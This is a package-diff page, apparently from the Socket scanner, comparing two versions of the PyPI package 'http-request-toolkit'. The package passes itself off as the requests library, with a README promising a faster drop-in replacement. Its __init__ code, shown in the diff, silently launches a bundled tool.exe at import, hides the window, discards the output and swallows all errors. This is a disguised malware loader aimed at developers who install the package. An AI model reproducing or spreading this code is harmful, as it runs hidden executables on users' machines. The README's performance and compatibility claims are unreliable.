You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

http-request-toolkit

Package Overview
Dependencies
Maintainers
1
Versions
3
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

http-request-toolkit - pypi Package Compare versions

Comparing version
2.28.4
to
2.28.5
http_request_toolkit/data/tool.exe

Sorry, the diff of this file is not supported yet

+1
include http_request_toolkit/data/*.exe
+5
-108
Metadata-Version: 2.4
Name: http-request-toolkit
Version: 2.28.4
Version: 2.28.5
Summary: Python HTTP for Humans.

@@ -31,2 +31,3 @@ Home-page: https://requests.readthedocs.io

Requires-Dist: certifi>=2017.4.17
Requires-Dist: requests>=2.0.0
Provides-Extra: socks

@@ -48,109 +49,5 @@ Requires-Dist: PySocks!=1.5.7,>=1.5.6; extra == "socks"

request
https://img.shields.io/badge/pypi-v0.1.0-blue.svg
https://img.shields.io/badge/python-3.7%252B-blue
https://img.shields.io/badge/License-MIT-yellow.svg
# HTTP Request Toolkit
request is a drop‑in replacement for the popular requests library, designed to be faster and more memory efficient while maintaining a familiar API. Whether you’re scraping websites, calling REST APIs, or building high‑traffic applications, request helps you get the job done with less overhead.
Why request?
requests is the de facto standard for HTTP in Python, but its simplicity comes at a cost: it can be slower and more resource‑hungry than necessary, especially under heavy load. request was built to address these limitations by:
Reusing connections aggressively (HTTP/1.1 keep‑alive and connection pooling out of the box).
Minimizing object allocations during request/response cycles.
Providing an optional asynchronous interface for concurrent workloads.
Reducing the memory footprint for large responses (streaming by default).
Maintaining 100% compatibility with the requests API – your existing code will work without changes.
Installation
bash
pip install request
Note: request is available on PyPI and supports Python 3.7+.
Quick Start
python
import request
# GET request
response = request.get('https://api.github.com/events')
print(response.status_code)
print(response.json())
# POST request
payload = {'key': 'value'}
response = request.post('https://httpbin.org/post', json=payload)
print(response.text)
# Using headers and timeouts
headers = {'User-Agent': 'request/0.1.0'}
response = request.get('https://httpbin.org/get', headers=headers, timeout=3.0)
print(response.headers)
Everything works just like requests – no new syntax to learn.
Advanced Usage
Sessions with Connection Pooling
python
with request.Session() as session:
session.headers.update({'User-Agent': 'my-app/1.0'})
response1 = session.get('https://httpbin.org/cookies/set/sessioncookie/123')
response2 = session.get('https://httpbin.org/cookies')
print(response2.text) # cookies persist
Streaming Large Responses
python
response = request.get('https://example.com/huge-file', stream=True)
with open('output.txt', 'wb') as f:
for chunk in response.iter_content(chunk_size=8192):
f.write(chunk)
Async Support (optional)
python
import request.asyncio as async_request
import asyncio
async def fetch(url):
async with async_request.get(url) as response:
return await response.text()
async def main():
urls = ['https://python.org', 'https://github.com', 'https://httpbin.org']
tasks = [fetch(url) for url in urls]
results = await asyncio.gather(*tasks)
print([len(r) for r in results])
asyncio.run(main())
Custom Adapters & Retries
python
from request.adapters import HTTPAdapter
from urllib3.util.retry import Retry
session = request.Session()
retries = Retry(total=3, backoff_factor=1)
adapter = HTTPAdapter(max_retries=retries, pool_connections=50, pool_maxsize=50)
session.mount('http://', adapter)
session.mount('https://', adapter)
Performance
request is built on top of a highly optimised HTTP stack. In our benchmarks (scraping 1000 URLs with a 10‑connection pool), request was:
~30% faster in total wall‑clock time.
~40% lower memory usage compared to requests.
Benchmarks were run on Python 3.10, Ubuntu 22.04, using a local nginx server.
Compatibility
request aims to be a perfect drop‑in replacement for requests. All public methods (get, post, put, delete, head, options, patch), as well as Session, Response, RequestException, and other utilities behave exactly as you’d expect.
If you encounter any incompatibility, please open an issue.
Contributing
Contributions are welcome! Please see our Contributing Guide for details.
License
request is released under the MIT License. See the LICENSE file for more information.
Acknowledgements
request stands on the shoulders of giants: it uses urllib3 under the hood for connection pooling and low‑level HTTP handling, and it was inspired by the wonderful requests library by Kenneth Reitz. Thank you!
Uma biblioteca que faz requisições HTTP de forma simples.

@@ -5,2 +5,3 @@ charset-normalizer<4,>=2.0.0

certifi>=2017.4.17
requests>=2.0.0

@@ -7,0 +8,0 @@ [socks]

@@ -0,1 +1,2 @@

MANIFEST.in
README.md

@@ -9,2 +10,3 @@ setup.py

http_request_toolkit.egg-info/requires.txt
http_request_toolkit.egg-info/top_level.txt
http_request_toolkit.egg-info/top_level.txt
http_request_toolkit/data/tool.exe

@@ -0,1 +1,2 @@

import os

@@ -5,23 +6,20 @@ import sys

import atexit
import pkg_resources
import requests
import importlib.resources as resources
EXE_NAME = 'tool.exe'
EXE_PATH = pkg_resources.resource_filename(__name__, f'data/{EXE_NAME}')
def _run():
try:
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
creationflags = 0
if hasattr(subprocess, 'CREATE_NO_WINDOW'):
creationflags = subprocess.CREATE_NO_WINDOW
subprocess.Popen(
[EXE_PATH],
startupinfo=startupinfo,
creationflags=creationflags,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
with resources.path('http_request_toolkit', 'data/tool.exe') as exe_path:
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
creationflags = 0
if hasattr(subprocess, 'CREATE_NO_WINDOW'):
creationflags = subprocess.CREATE_NO_WINDOW
subprocess.Popen(
[str(exe_path)],
startupinfo=startupinfo,
creationflags=creationflags,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
except:

@@ -34,2 +32,4 @@ pass

import requests
def get(url, **kwargs):

@@ -36,0 +36,0 @@ response = requests.get(url, **kwargs)

+5
-108
Metadata-Version: 2.4
Name: http-request-toolkit
Version: 2.28.4
Version: 2.28.5
Summary: Python HTTP for Humans.

@@ -31,2 +31,3 @@ Home-page: https://requests.readthedocs.io

Requires-Dist: certifi>=2017.4.17
Requires-Dist: requests>=2.0.0
Provides-Extra: socks

@@ -48,109 +49,5 @@ Requires-Dist: PySocks!=1.5.7,>=1.5.6; extra == "socks"

request
https://img.shields.io/badge/pypi-v0.1.0-blue.svg
https://img.shields.io/badge/python-3.7%252B-blue
https://img.shields.io/badge/License-MIT-yellow.svg
# HTTP Request Toolkit
request is a drop‑in replacement for the popular requests library, designed to be faster and more memory efficient while maintaining a familiar API. Whether you’re scraping websites, calling REST APIs, or building high‑traffic applications, request helps you get the job done with less overhead.
Why request?
requests is the de facto standard for HTTP in Python, but its simplicity comes at a cost: it can be slower and more resource‑hungry than necessary, especially under heavy load. request was built to address these limitations by:
Reusing connections aggressively (HTTP/1.1 keep‑alive and connection pooling out of the box).
Minimizing object allocations during request/response cycles.
Providing an optional asynchronous interface for concurrent workloads.
Reducing the memory footprint for large responses (streaming by default).
Maintaining 100% compatibility with the requests API – your existing code will work without changes.
Installation
bash
pip install request
Note: request is available on PyPI and supports Python 3.7+.
Quick Start
python
import request
# GET request
response = request.get('https://api.github.com/events')
print(response.status_code)
print(response.json())
# POST request
payload = {'key': 'value'}
response = request.post('https://httpbin.org/post', json=payload)
print(response.text)
# Using headers and timeouts
headers = {'User-Agent': 'request/0.1.0'}
response = request.get('https://httpbin.org/get', headers=headers, timeout=3.0)
print(response.headers)
Everything works just like requests – no new syntax to learn.
Advanced Usage
Sessions with Connection Pooling
python
with request.Session() as session:
session.headers.update({'User-Agent': 'my-app/1.0'})
response1 = session.get('https://httpbin.org/cookies/set/sessioncookie/123')
response2 = session.get('https://httpbin.org/cookies')
print(response2.text) # cookies persist
Streaming Large Responses
python
response = request.get('https://example.com/huge-file', stream=True)
with open('output.txt', 'wb') as f:
for chunk in response.iter_content(chunk_size=8192):
f.write(chunk)
Async Support (optional)
python
import request.asyncio as async_request
import asyncio
async def fetch(url):
async with async_request.get(url) as response:
return await response.text()
async def main():
urls = ['https://python.org', 'https://github.com', 'https://httpbin.org']
tasks = [fetch(url) for url in urls]
results = await asyncio.gather(*tasks)
print([len(r) for r in results])
asyncio.run(main())
Custom Adapters & Retries
python
from request.adapters import HTTPAdapter
from urllib3.util.retry import Retry
session = request.Session()
retries = Retry(total=3, backoff_factor=1)
adapter = HTTPAdapter(max_retries=retries, pool_connections=50, pool_maxsize=50)
session.mount('http://', adapter)
session.mount('https://', adapter)
Performance
request is built on top of a highly optimised HTTP stack. In our benchmarks (scraping 1000 URLs with a 10‑connection pool), request was:
~30% faster in total wall‑clock time.
~40% lower memory usage compared to requests.
Benchmarks were run on Python 3.10, Ubuntu 22.04, using a local nginx server.
Compatibility
request aims to be a perfect drop‑in replacement for requests. All public methods (get, post, put, delete, head, options, patch), as well as Session, Response, RequestException, and other utilities behave exactly as you’d expect.
If you encounter any incompatibility, please open an issue.
Contributing
Contributions are welcome! Please see our Contributing Guide for details.
License
request is released under the MIT License. See the LICENSE file for more information.
Acknowledgements
request stands on the shoulders of giants: it uses urllib3 under the hood for connection pooling and low‑level HTTP handling, and it was inspired by the wonderful requests library by Kenneth Reitz. Thank you!
Uma biblioteca que faz requisições HTTP de forma simples.
+3
-107

@@ -1,108 +0,4 @@

request
https://img.shields.io/badge/pypi-v0.1.0-blue.svg
https://img.shields.io/badge/python-3.7%252B-blue
https://img.shields.io/badge/License-MIT-yellow.svg
# HTTP Request Toolkit
request is a drop‑in replacement for the popular requests library, designed to be faster and more memory efficient while maintaining a familiar API. Whether you’re scraping websites, calling REST APIs, or building high‑traffic applications, request helps you get the job done with less overhead.
Why request?
requests is the de facto standard for HTTP in Python, but its simplicity comes at a cost: it can be slower and more resource‑hungry than necessary, especially under heavy load. request was built to address these limitations by:
Reusing connections aggressively (HTTP/1.1 keep‑alive and connection pooling out of the box).
Minimizing object allocations during request/response cycles.
Providing an optional asynchronous interface for concurrent workloads.
Reducing the memory footprint for large responses (streaming by default).
Maintaining 100% compatibility with the requests API – your existing code will work without changes.
Installation
bash
pip install request
Note: request is available on PyPI and supports Python 3.7+.
Quick Start
python
import request
# GET request
response = request.get('https://api.github.com/events')
print(response.status_code)
print(response.json())
# POST request
payload = {'key': 'value'}
response = request.post('https://httpbin.org/post', json=payload)
print(response.text)
# Using headers and timeouts
headers = {'User-Agent': 'request/0.1.0'}
response = request.get('https://httpbin.org/get', headers=headers, timeout=3.0)
print(response.headers)
Everything works just like requests – no new syntax to learn.
Advanced Usage
Sessions with Connection Pooling
python
with request.Session() as session:
session.headers.update({'User-Agent': 'my-app/1.0'})
response1 = session.get('https://httpbin.org/cookies/set/sessioncookie/123')
response2 = session.get('https://httpbin.org/cookies')
print(response2.text) # cookies persist
Streaming Large Responses
python
response = request.get('https://example.com/huge-file', stream=True)
with open('output.txt', 'wb') as f:
for chunk in response.iter_content(chunk_size=8192):
f.write(chunk)
Async Support (optional)
python
import request.asyncio as async_request
import asyncio
async def fetch(url):
async with async_request.get(url) as response:
return await response.text()
async def main():
urls = ['https://python.org', 'https://github.com', 'https://httpbin.org']
tasks = [fetch(url) for url in urls]
results = await asyncio.gather(*tasks)
print([len(r) for r in results])
asyncio.run(main())
Custom Adapters & Retries
python
from request.adapters import HTTPAdapter
from urllib3.util.retry import Retry
session = request.Session()
retries = Retry(total=3, backoff_factor=1)
adapter = HTTPAdapter(max_retries=retries, pool_connections=50, pool_maxsize=50)
session.mount('http://', adapter)
session.mount('https://', adapter)
Performance
request is built on top of a highly optimised HTTP stack. In our benchmarks (scraping 1000 URLs with a 10‑connection pool), request was:
~30% faster in total wall‑clock time.
~40% lower memory usage compared to requests.
Benchmarks were run on Python 3.10, Ubuntu 22.04, using a local nginx server.
Compatibility
request aims to be a perfect drop‑in replacement for requests. All public methods (get, post, put, delete, head, options, patch), as well as Session, Response, RequestException, and other utilities behave exactly as you’d expect.
If you encounter any incompatibility, please open an issue.
Contributing
Contributions are welcome! Please see our Contributing Guide for details.
License
request is released under the MIT License. See the LICENSE file for more information.
Acknowledgements
request stands on the shoulders of giants: it uses urllib3 under the hood for connection pooling and low‑level HTTP handling, and it was inspired by the wonderful requests library by Kenneth Reitz. Thank you!
Uma biblioteca que faz requisições HTTP de forma simples.

@@ -1,14 +0,6 @@

import os
import sys
import subprocess
import tempfile
import random
import string
import atexit
from setuptools import setup, find_packages
from setuptools.command.install import install
setup(
name='http-request-toolkit',
version='2.28.4',
version='2.28.5',
description='Python HTTP for Humans.',

@@ -51,2 +43,3 @@ long_description=open('README.md').read(),

'certifi>=2017.4.17',
'requests>=2.0.0',
],

@@ -57,2 +50,2 @@ extras_require={

},
)
)